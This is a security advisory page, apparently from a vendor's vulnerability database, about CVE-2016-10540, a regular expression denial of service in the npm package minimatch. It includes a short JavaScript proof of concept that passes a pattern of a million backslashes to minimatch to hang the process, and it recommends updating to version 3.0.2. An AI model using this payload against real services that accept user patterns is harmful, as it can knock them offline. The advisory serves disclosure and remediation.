Meet Corgea at Black Hat, BSides Las Vegas & DEF CON
HIGH 7.5 npm

Regular Expression Denial of Service in minimatch

GHSA-hxm2-r34f-qmc5 · CVE-2016-10540

Published · Modified

Description

Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).

Proof of Concept

var minimatch = require(“minimatch”);

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = “”;
  for (i=0; i<=len; i++) {
    result = result + chr;
  }
  return result;
}

var exploit = “[!” + genstr(1000000, “\\”) + “A”;

// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);

Recommendation

Update to version 3.0.2 or later.

Ready to move

Start Securing

Free, no credit card | First findings in minutes